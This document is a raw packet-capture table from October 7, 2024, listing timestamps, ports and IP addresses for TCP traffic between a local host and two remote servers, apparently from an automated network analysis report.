Oct 7, 2024 03:15:43.253952026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253967047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253979921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253997087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254008055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254014969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254029989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254040003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254064083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254075050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254091024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254100084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254117966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254132986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254141092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254148960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254163027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254182100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254209995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254209995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254225969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254244089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254252911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254260063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254275084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254291058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254301071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254317045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254327059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254333019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254352093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254359961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254378080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254386902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254395008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254415989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254427910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254434109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254451990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254452944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254482031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254488945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254498959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254514933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254525900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254529953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254547119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254564047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254568100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254580975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254601955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254607916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254625082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254635096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254637957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254659891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254664898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254681110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254694939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254697084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254714966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254729986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254734993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254750013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254760981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254776955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254786015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254793882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254811049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254822016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254837990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254854918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254861116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254869938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254882097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254884958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254900932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254915953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254920959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254933119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254951000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254961967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.254967928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254983902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.254986048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.255002975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.255017042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.255022049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.255059958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.255079985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.279947042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.284805059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.409703016 CEST	443	49852	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.411364079 CEST	49852	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.411390066 CEST	443	49852	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.412051916 CEST	49852	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.412056923 CEST	443	49852	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.486717939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486735106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486751080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486807108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.486835957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486840010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.486852884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486866951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486891985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486898899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.486906052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486922979 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486937046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.486948013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486958981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.486963987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486988068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.486998081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487003088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487029076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487037897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487042904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487057924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487061024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487085104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487106085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487111092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487121105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487137079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487149000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487164021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487173080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487180948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487198114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487210989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487222910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487237930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487248898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487251997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487267971 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487277031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487293005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487307072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487308025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487332106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487340927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487346888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487363100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487369061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487381935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487405062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487406969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487422943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487440109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487441063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487462044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487468004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487488031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487502098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487503052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487540007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487549067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487561941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487565041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487580061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487597942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487615108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487621069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487631083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487641096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487646103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487662077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487664938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487685919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487689018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487700939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487715006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487723112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487730980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487766981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487782001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487797022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487801075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487812042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487835884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487852097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487859964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487865925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487881899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487896919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487898111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487934113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487938881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487953901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487967014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.487971067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.487989902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488003016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.488007069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488023043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488039017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488040924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.488054991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488064051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.488086939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.488104105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488118887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488120079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.488132954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488148928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488149881 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.488167048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488173962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.488183022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488194942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.488200903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488214970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.488233089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.488262892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.508218050 CEST	443	49852	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.508382082 CEST	443	49852	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.508474112 CEST	49852	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.509408951 CEST	49852	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.509444952 CEST	443	49852	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.509470940 CEST	49852	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.509485006 CEST	443	49852	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.510622978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.513089895 CEST	49861	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.513149023 CEST	443	49861	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.513221979 CEST	49861	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.513602018 CEST	49861	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.513617992 CEST	443	49861	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.515477896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.717580080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.717638016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.717662096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.717688084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.717691898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.717725039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.717778921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.717778921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.717817068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.717833042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.717850924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.717864037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.717884064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.717919111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.717936039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.717967987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.717972994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718029022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718080044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718082905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718116999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718141079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718162060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718168974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718206882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718214989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718256950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718260050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718293905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718310118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718342066 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718348026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718390942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718399048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718424082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718439102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718471050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718477011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718528986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718561888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718578100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718611002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718615055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718648911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718663931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718697071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718703032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718738079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718746901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718786955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718794107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718827009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718852043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718878984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718882084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718913078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.718926907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718965054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.718966007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719002962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719013929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719036102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719063044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719070911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719091892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719105959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719125032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719141006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719180107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719180107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719197035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719250917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719294071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719300985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719304085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719353914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719353914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719404936 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719404936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719460011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719491959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719507933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719511986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719547033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719561100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719579935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719595909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719629049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719635010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719681978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719686985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719721079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719733000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719768047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719773054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719808102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719818115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719841003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719856024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719877005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719890118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719909906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719923019 CEST	49782	80	192.168.2.5	95.164.90.97
